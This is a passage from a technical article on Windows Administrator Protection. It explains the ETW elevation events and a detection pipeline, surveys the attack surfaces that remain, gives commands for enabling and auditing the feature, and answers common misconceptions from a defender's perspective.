Event ID 15031: Elevation Approved.
Event ID 15032: Elevation Denied or Failed.

Each event carries the caller user SID, the application name and path, the elevation outcome, the SMAA used to host the elevation, and the authentication method (Hello PIN, biometric, password) [@ms-admin-protection]. The authentication method field records the primary user's Hello credential, not the SMAA's; the SMAA's authentication in step 6 of §7 is the credential-less LSA logon and has no method field of its own. Microsoft Learn documents a short logman invocation for capturing the trace.

Definition: *Microsoft-Windows-LUA* is the Event Tracing for Windows provider that surfaces Administrator Protection elevation events. Provider GUID `{93c05d69-51a3-485e-877f-1806a8731346}`. Event ID 15031 marks an elevation that succeeded; Event ID 15032 marks an elevation that was denied or failed. Each event carries fields for the caller's SID, the application path, the elevation outcome, the SMAA used, and the authentication method [@ms-admin-protection].

```javascript
// Pseudocode for a detection pipeline that reads ETW Event 15031
// (Administrator Protection elevation approved) and flags unusual
// application paths per SMAA correlation key.
// The event shape and field names are illustrative, not a documented schema.

// Windows paths are case-insensitive, so the allow list is stored lower-cased.
const allowList = new Set([
  'C:\\Windows\\System32\\mmc.exe',
  'C:\\Windows\\System32\\regedit.exe',
  'C:\\Windows\\System32\\cmd.exe',
  'C:\\Program Files\\Microsoft VS Code\\Code.exe',
].map((path) => path.toLowerCase()));

// Stand-in alert sink; replace with whatever the pipeline forwards to.
function emit(alert) {
  console.log(JSON.stringify(alert));
}

function onEtwEvent(event) {
  if (event.provider !== 'Microsoft-Windows-LUA') return;
  if (event.id !== 15031) return;

  const smaa = event.fields.shadowAccountName;
  const app = event.fields.applicationPath;
  const auth = event.fields.authenticationMethod;
  const user = event.fields.callerUserSid;

  if (!allowList.has(app.toLowerCase())) {
    emit({
      severity: 'high',
      title: 'Unexpected elevation under Administrator Protection',
      smaa, app, auth, user,
      hint: 'Was the Hello prompt phished?',
    });
  }
}
```

Note: For detection engineers, the ADMIN_<random> name is the highest-value correlation key on the device. It is stable per primary admin (the SMAA name is created once and persists across elevations), distinct from the limited-user SID (the SMAA has its own SID, so user-by-SID correlations and SMAA-by-name correlations are independent axes), and present in every ETW 15031 / 15032 event. A detection rule that groups elevations by SMAA name and flags unexpected application paths is the canonical "someone phished a Hello prompt" alert pattern.
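
The grouping rule in the note can be sketched as a batch function over already-parsed events. As with the pseudocode above, the event shape and the field names `shadowAccountName` and `applicationPath` are illustrative assumptions rather than a documented schema, and `groupUnexpectedBySmaa` is a hypothetical name.

```javascript
// Groups approved elevations (Event ID 15031) by SMAA name and keeps
// only application paths that are not on the expected list.
function groupUnexpectedBySmaa(events, expectedPaths) {
  const expected = new Set(expectedPaths.map((p) => p.toLowerCase()));
  const bySmaa = new Map(); // SMAA name -> array of unexpected paths

  for (const event of events) {
    if (event.id !== 15031) continue;
    const app = event.fields.applicationPath;
    if (expected.has(app.toLowerCase())) continue;

    const smaa = event.fields.shadowAccountName;
    if (!bySmaa.has(smaa)) bySmaa.set(smaa, []);
    bySmaa.get(smaa).push(app);
  }
  return bySmaa;
}

// Placeholder events; the SMAA name and paths are made up.
const sampleEvents = [
  { id: 15031, fields: { shadowAccountName: 'ADMIN_example', applicationPath: 'C:\\Windows\\System32\\mmc.exe' } },
  { id: 15031, fields: { shadowAccountName: 'ADMIN_example', applicationPath: 'C:\\Users\\alice\\Downloads\\setup.exe' } },
  { id: 15032, fields: { shadowAccountName: 'ADMIN_example', applicationPath: 'C:\\Temp\\denied.exe' } },
];

const grouped = groupUnexpectedBySmaa(sampleEvents, ['C:\\Windows\\System32\\mmc.exe']);
console.log(grouped.get('ADMIN_example').length); // 1
```

Keying on the SMAA name rather than the caller SID keeps the two correlation axes described in the note independent.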

Defenders now have the audit trail they did not have under UAC. The next section asks what residual attack surface survives the SMAA architecture, the Hello gate, and the new audit trail.

15. Open problems: what survives

Five residual attack surfaces, each acknowledged in Microsoft's own documentation, Forshaw's Project Zero posts, or the operational literature on Windows privilege escalation.

The user is still the weak link. Every elevation depends on a human accepting the prompt. The Hello credential gate makes that human's decision more costly to fake than the classic Yes/No, but the gate does not change the fact that a successful prompt is a successful elevation. The three sub-cases of consent-without-identity-verification from §9 -- unattended-session, habituated-click, pretext click-through -- are cost-raised, not closed. Phishing-the-prompt remains a live attack surface and Microsoft does not classify it as a vulnerability [@forshaw-pz-jan2026]. Out-of-band consent -- a phone-push approval channel, a smartcard tap, a separate hardware key tap -- would close the gap; none of these is the Administrator Protection default.

Loopback authentication. The structural property that Windows services authenticate to themselves over the local network stack is independent of the SMAA model. SMB to localhost, Kerberos against the local machine account, NTLM challenge-response between processes on the same box -- these protocols predate UAC and are not changed by Administrator Protection. Forshaw's broader 2022 Kerberos research [@forshaw-2022-rbcd] catalogues the class. The NTLMless article in this series covers SMB signing, Extended Protection for Authentication (EPA), and channel binding mitigations that defenders should pair with Administrator Protection to close the loopback path.

Service-account SeImpersonatePrivilege. The Potato lineage of attacks (catalogued in the Access Control article in this series) runs in service accounts (IIS_IUSRS, LOCAL SERVICE, NETWORK SERVICE), not in interactive admin sessions. Administrator Protection scopes itself to interactive admin elevation; the Potato class is structurally out of scope.

Service-account Potato attacks run inside `IIS_IUSRS`, `LOCAL SERVICE`, and `NETWORK SERVICE` rather than in interactive admin sessions. The attacker has compromised a service that holds `SeImpersonatePrivilege`, then uses one of several primitives (the SSPI / NEGOEX dance, the EFS RPC interface, a printer-spooler endpoint) to coerce a higher-privileged service into authenticating against the attacker's local socket, and impersonates the resulting token. Administrator Protection's promise is around the *interactive elevation* path -- the flow from a logged-in user clicking an installer to an elevated process running. Potato is a separate problem class with its own mitigations: removing `SeImpersonatePrivilege` from service accounts that don't need it, applying EPA, and patching the named primitives one by one.
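
The first mitigation, removing `SeImpersonatePrivilege` where it is not needed, starts with an inventory review. The sketch below assumes a hypothetical inventory format (the `account`, `privileges`, and `needsImpersonation` fields are invented for the example, as are the account names); how that inventory is collected is outside its scope.

```javascript
// Sketch: list service accounts that hold SeImpersonatePrivilege without a
// recorded need for it. The inventory format is hypothetical.
function impersonationReviewList(inventory) {
  return inventory
    .filter((entry) => entry.privileges.includes('SeImpersonatePrivilege'))
    .filter((entry) => !entry.needsImpersonation)
    .map((entry) => entry.account);
}

// Hypothetical sample inventory for illustration only.
const serviceInventory = [
  { account: 'svc-web', privileges: ['SeImpersonatePrivilege'], needsImpersonation: true },
  { account: 'svc-report', privileges: ['SeImpersonatePrivilege', 'SeChangeNotifyPrivilege'], needsImpersonation: false },
  { account: 'svc-batch', privileges: ['SeChangeNotifyPrivilege'], needsImpersonation: false },
];
const reviewList = impersonationReviewList(serviceInventory);
console.log(reviewList);
```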

Driver loading once inside an SMAA elevation. Admin equals kernel applies once a process is running inside the SMAA. Vulnerable-driver loading, kernel-mode code execution, and rootkit installation fall under the §11 "admin equals kernel" ceiling -- WHQL signing, the Vulnerable Driver Blocklist, App Control for Business, and HVCI remain the four-mechanism mitigation surface, with the App Identity article in this series covering the App Control mechanism. Administrator Protection does not change the relationship between admin and kernel; it changes the relationship between standard user and admin.

The Hello credential phishing surface. The prompt now phishes a real credential rather than a click-through approval. A malicious application that successfully argues its case to the user gets a Hello gesture against the primary user's PIN or biometric. The credential remains hardware-rooted; ESS-engaged biometrics never leave the TPM or Pluton enclave; the malware does not learn the PIN. But the malware does get the elevation. The Windows Hello article in this series covers FIDO2 / ESS / PIN architecture hardening. Defender-side mitigation is the ETW 15031 / 15032 detection rule set on unexpected application paths [@ms-admin-protection].

The boundary is real, the audit trail is new, and the five-class residual surface is the next decade of work. The next section turns to operator-side practicalities.

16. Practical guide

Six tips, each tied to one Microsoft Learn or Windows Developer Blog primary source. Remember that, as of December 2025, Microsoft has reverted the rollout and the feature is currently disabled on stable Windows; the guidance below applies once Microsoft re-enables it. The verbatim commands follow the tips.

Enable. Set TypeOfAdminApprovalMode = 2 via Group Policy ("User Account Control: Configure type of Admin Approval Mode" -> "Admin Approval Mode with Administrator Protection") or via the Intune Settings Catalog OMA-URI. A reboot is required for the new policy to take effect [@ms-admin-protection, @ms-kb5067036].
Verify. Run `whoami` in an elevated console; the user name shows ADMIN_<random>. Run `whoami /groups` (not `whoami /priv`, which lists privileges rather than group memberships) to confirm the SMAA has the Administrators group enabled [@ms-admin-protection, @call4cloud-osint].
Capture. Start the ETW trace with the documented logman invocation; filter for Event IDs 15031 and 15032 [@ms-admin-protection]. The provider GUID is stable across builds.
Do not enable on devices that require Hyper-V or WSL. Re-evaluate when Microsoft re-enables the broad rollout [@ms-admin-protection, @forshaw-pz-jan2026].
For application developers, follow the Windows Developer Blog (May 19, 2025) guidance [@ms-developer-blog-2025]: install per-user packages unelevated; use %ProgramFiles% (and accept the elevated install path); avoid context switching during install; avoid sharing files between elevated and unelevated profiles; remove auto-elevation dependencies. The auto-elevation manifest attribute is no longer honoured under Administrator Protection, so any installer that relied on silent elevation needs to be reworked.
For IT admins on already-enabled devices broken by an elevated install: disable Administrator Protection temporarily, reinstall the application unelevated, then re-enable [@ms-developer-blog-2025].

Enable via Group Policy registry value (administrator console, persists across reboots):

# Set TypeOfAdminApprovalMode to 2 (Admin Approval Mode with Administrator Protection)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v TypeOfAdminApprovalMode /t REG_DWORD /d 2 /f
# Reboot required:
shutdown /r /t 0
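
After the reboot, the value can be read back with `reg query` against the same key and interpreted. The following is a small sketch of that interpretation step, assuming the usual `reg query` text layout (value name, `REG_DWORD`, hex value on one line). The function names are invented for the example, and only the two meanings given in this article (1 and 2) are mapped.

```javascript
// Sketch: interpret the text printed by
//   reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v TypeOfAdminApprovalMode
function parseApprovalMode(regQueryOutput) {
  const match = /^\s*TypeOfAdminApprovalMode\s+REG_DWORD\s+(0x[0-9a-f]+)\s*$/im.exec(regQueryOutput);
  return match ? parseInt(match[1], 16) : null; // null: value not present
}

function describeApprovalMode(value) {
  // 1 and 2 are the meanings given in this article; other values are not interpreted here.
  if (value === 1) return 'classic Admin Approval Mode';
  if (value === 2) return 'Admin Approval Mode with Administrator Protection';
  return 'not set or not covered here';
}

// Sample output in the assumed layout, for illustration only.
const sampleRegOutput = [
  '',
  'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System',
  '    TypeOfAdminApprovalMode    REG_DWORD    0x2',
  '',
].join('\r\n');

const approvalMode = parseApprovalMode(sampleRegOutput);
console.log(approvalMode, describeApprovalMode(approvalMode));
```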

Capture the elevation event trace:

logman start AdminProtectionTrace -p {93c05d69-51a3-485e-877f-1806a8731346} -ets
:: After some elevations:
logman stop AdminProtectionTrace -ets
:: Process the .etl with PerfView, Message Analyzer, or:
wevtutil qe Microsoft-Windows-LUA/Operational /q:"*[System[(EventID=15031 or EventID=15032)]]" /f:text
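
For a quick triage of the `wevtutil` text output, the events can be tallied per Event ID. This sketch assumes the `/f:text` layout in which each record carries an `Event ID: <number>` line; the sample below is abbreviated and hypothetical, and real output contains more fields per record.

```javascript
// Sketch: tally events per Event ID from `wevtutil ... /f:text` output.
// Assumes each record contains a line of the form "Event ID: <number>".
function countEventIds(wevtutilText) {
  const counts = new Map();
  for (const match of wevtutilText.matchAll(/^\s*Event ID:\s*(\d+)\s*$/gm)) {
    const id = Number(match[1]);
    counts.set(id, (counts.get(id) || 0) + 1);
  }
  return counts;
}

// Abbreviated, hypothetical sample for illustration only.
const sampleWevtutilText = [
  'Event[0]:',
  '  Event ID: 15031',
  'Event[1]:',
  '  Event ID: 15032',
  'Event[2]:',
  '  Event ID: 15031',
].join('\n');

const eventCounts = countEventIds(sampleWevtutilText);
console.log([...eventCounts.entries()]);
```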

Verify the SMAA presence after enablement:

Get-LocalUser | Where-Object Name -like 'ADMIN_*'
# After an elevation, run from the elevated console:
whoami
# Expect: WIN11-PC\ADMIN_<random16hex>
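
The expected `whoami` result can be checked mechanically. The pattern below is a sketch built on the comment above: it assumes the suffix is exactly 16 hexadecimal characters, which may not hold on every build, and the helper name `looksLikeSmaa` is invented for the example.

```javascript
// Sketch: does a `whoami` result look like <machine>\ADMIN_<16 hex characters>?
// The 16-hex suffix is an assumption taken from the comment above.
function looksLikeSmaa(whoamiOutput) {
  // whoami typically prints lower case, so match case-insensitively.
  return /^[^\\]+\\ADMIN_[0-9a-f]{16}$/i.test(whoamiOutput.trim());
}

const smaaCheck = looksLikeSmaa('win11-pc\\admin_0123456789abcdef');
const primaryCheck = looksLikeSmaa('win11-pc\\alice');
console.log(smaaCheck, primaryCheck);
```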

Note: The single most common mistake in response to an Administrator Protection compatibility problem is to disable UAC globally by setting EnableLUA = 0. This returns the device to the Windows XP single-token model, removes Mandatory Integrity Control enforcement on application processes, and effectively defeats every layer of UAC and Administrator Protection together. It is universally discouraged. The correct fix is per-application, via manifest, or per-device, via the documented Administrator Protection compatibility list.
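
A configuration check can catch that mistake before it ships. The sketch below assumes the two registry values have already been read into a plain object (the object shape, severity labels, and function name are invented for the example); it flags `EnableLUA = 0` and notes when Administrator Protection is not selected.

```javascript
// Sketch: flag the EnableLUA = 0 anti-pattern in an already-collected policy object.
function assessElevationPolicy(policy) {
  const findings = [];
  if (policy.EnableLUA === 0) {
    findings.push({
      severity: 'critical',
      message: 'EnableLUA = 0 disables UAC and Administrator Protection together',
    });
  }
  if (policy.TypeOfAdminApprovalMode !== 2) {
    findings.push({
      severity: 'info',
      message: 'Administrator Protection is not selected (TypeOfAdminApprovalMode is not 2)',
    });
  }
  return findings;
}

// Hypothetical device states for illustration only.
const brokenDevice = assessElevationPolicy({ EnableLUA: 0, TypeOfAdminApprovalMode: 2 });
const healthyDevice = assessElevationPolicy({ EnableLUA: 1, TypeOfAdminApprovalMode: 2 });
console.log(brokenDevice, healthyDevice);
```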

Six tips, one boundary, one operational checklist. The next section answers the most common misconceptions.

17. Frequently asked questions

No. Administrator Protection runs in `appinfo.dll` inside the Application Information service, which runs in `svchost.exe` in VTL0 (the normal Windows environment, outside the VTL1 secure world). The SMAA itself is a normal SAM-database account, not a Virtual Secure Mode trustlet. The cross-process protections of Virtualization-Based Security apply to LSASS Credential Guard and a handful of other VTL1 services; the elevation pipeline is not one of them. The Secure Kernel article in this series treats VTL0 / VTL1 separation in detail.

Partially. Administrator Protection replaces Admin Approval Mode UAC when `TypeOfAdminApprovalMode = 2`. The credential-prompt path (the over-the-shoulder elevation that asks a standard user to enter an administrator's credentials) and classic Admin Approval Mode (`TypeOfAdminApprovalMode = 1`) coexist with Administrator Protection across different configurations [@ms-admin-protection]. On a device with Administrator Protection enabled, only the interactive admin's elevation path goes through the SMAA; the standard-user-asking-for-admin-credentials path is unchanged.

No. There is absolutely an admin token; it lives in a different account, in a different logon session, for a bounded lifetime. The marketing language describes lifetime and isolation, not nonexistence [@ms-developer-blog-2025, @bleepingcomputer-2024]. The SMAA's token persists for the lifetime of the elevated process; when the process exits, the token handle is released and the logon session is reaped. Between elevations, no SMAA token exists in memory.

No. Malware can still elevate if the user accepts the Hello prompt. The boundary Administrator Protection creates is between *silent* elevation and *consented* elevation, not between any elevation and none. Forshaw states the expectation plainly: "I expect that malware will still be able to get administrator privileges even if that's just by forcing a user to accept the elevation prompt" [@forshaw-pz-jan2026]. The three sub-cases of consent-without-identity-verification from §9 are cost-raised, not eliminated. What changes is that the elevation must be visible. Defenders gain the ETW 15031 audit trail as a result.

No. EPM uses a virtual elevated account on a per-request basis with cloud-side policy, and the virtual account is *not* a member of the local Administrators group [@ms-epm-overview]. Administrator Protection uses a persistent local SMAA per admin user, with on-box `appinfo.dll` policy, and the SMAA *is* a member of the local Administrators group [@call4cloud-osint]. EPM is centrally policy-driven and works on standard-user devices; Administrator Protection is per-device architecture and applies only to interactive admin users. The two can coexist on the same device.

No. Per Microsoft Learn, remote logon, roaming profiles, and backup admins are out of scope [@ms-admin-protection]. A domain administrator who logs into a workstation interactively will not see the SMAA path. Microsoft has stated that domain scenarios may be added in future iterations; the current GA-target form is local-machine-only, interactive-admin-only.

No. Mimikatz inside the elevated SMAA session still has `SeDebugPrivilege` and can call `OpenProcess` on `lsass.exe` to dump LSASS unless LSA Protection (Run As Protected Process Light) and Credential Guard are also enabled. Administrator Protection protects the *elevation path*; it does not protect the *resulting privileged session*. To protect the privileged session, pair Administrator Protection with LSA Protection (`RunAsPPL=1`), Credential Guard, App Control for Business, and HVCI. The Secure Kernel article in this series covers the LSA Protection mechanism.
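
The pairing advice in the last answer can be expressed as a simple gap check. This is a sketch under stated assumptions: the `deviceState` object and its boolean field names are hypothetical, and how each control's state is actually detected on a device is not shown.

```javascript
// Sketch: list which companion controls named above are not enabled.
// The deviceState shape and field names are hypothetical.
const COMPANION_CONTROLS = ['lsaProtection', 'credentialGuard', 'appControlForBusiness', 'hvci'];

function missingCompanions(deviceState) {
  return COMPANION_CONTROLS.filter((name) => deviceState[name] !== true);
}

// Hypothetical device state for illustration only.
const companionGaps = missingCompanions({
  lsaProtection: true,
  credentialGuard: false,
  appControlForBusiness: true,
});
console.log(companionGaps);
```

A control that is absent from the input is treated as not enabled, which errs on the side of reporting a gap.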

The misconceptions are cleared. The next section returns to the opening hook with the new vocabulary the article has built.

18. The user-elevation companion to Credential Guard

Return to the two whoami /all outputs from §1, this time with the vocabulary the article has built.

The first output shows the primary user under classic UAC. One SID, one profile, one HKCU, one logon-session LUID; the elevated console is the same user as the unelevated console, distinguished only by the integrity level on the token.

The second output shows the same login under Administrator Protection. A different user name -- ADMIN_<random> -- with a different SID linked to the primary admin via ShadowAccountForwardLinkSid and ShadowAccountBackLinkSid. A different profile under C:\Users\ADMIN_<random>\. A different NTUSER.DAT mapped as HKCU. A fresh authentication-ID LUID minted by LSASS through the credential-less logon path described in §7, on the strength of appinfo.dll's trusted request and a Hello gesture the primary user just performed. An ETW Event 15031 in the Microsoft-Windows-LUA provider, freshly emitted, recording the elevation as approved, the application path, and the authentication method.

The thesis lands. The elevation path is now itself a security boundary, with bulletin-grade fixes when it fails. Administrator Protection is the user-elevation companion to Credential Guard. Where Credential Guard isolated LSA secrets from admin-equals-kernel inside the machine -- the Secure Kernel article in this series covers the VBS-rooted isolation in detail -- Administrator Protection isolates the elevation path from the standard-user session. The two answer the two halves of the question the foundational Access Control article in this series left open: if admin equals kernel and tokens are bearer credentials, what is left to harden? The answer is the path that gets you there (Administrator Protection) and the data that is there once you arrive (Credential Guard).

The December 2025 revert is the first iteration's learning round. The architecture is the right one. The application base catches up next. Forshaw's framing in February 2026 -- that Microsoft might have shipped this as a configurable mode rather than replacing admin approval completely -- is a reasonable critique, and the re-enablement is likely to address it. Until then, the operational reality on most stable Windows devices is the classic split-token model, with all the bypass canon it implies, and the SMAA design remains an Insider-Preview-and-policy-opted-in posture.

What stays unchanged is the structural insight. The mechanism Microsoft used to make the elevation path a boundary is not novel; multi-user accounts have shipped in Windows NT since 1993. What changed is the classification. Microsoft accepted, after twenty years of evidence, that the elevation pipeline needed to be a security boundary, and accepted with it the engineering cost: separate accounts, separate profiles, separate logon sessions, removal of auto-elevation, a credential gate instead of a click-through, an audit-trail ETW provider, and a willingness to ship bulletin-grade fixes for every Forshaw finding. The classification was the engineering decision. Everything else followed.

This is what it took, in mechanism and in time, to make the elevation path real [@forshaw-pz-jan2026].
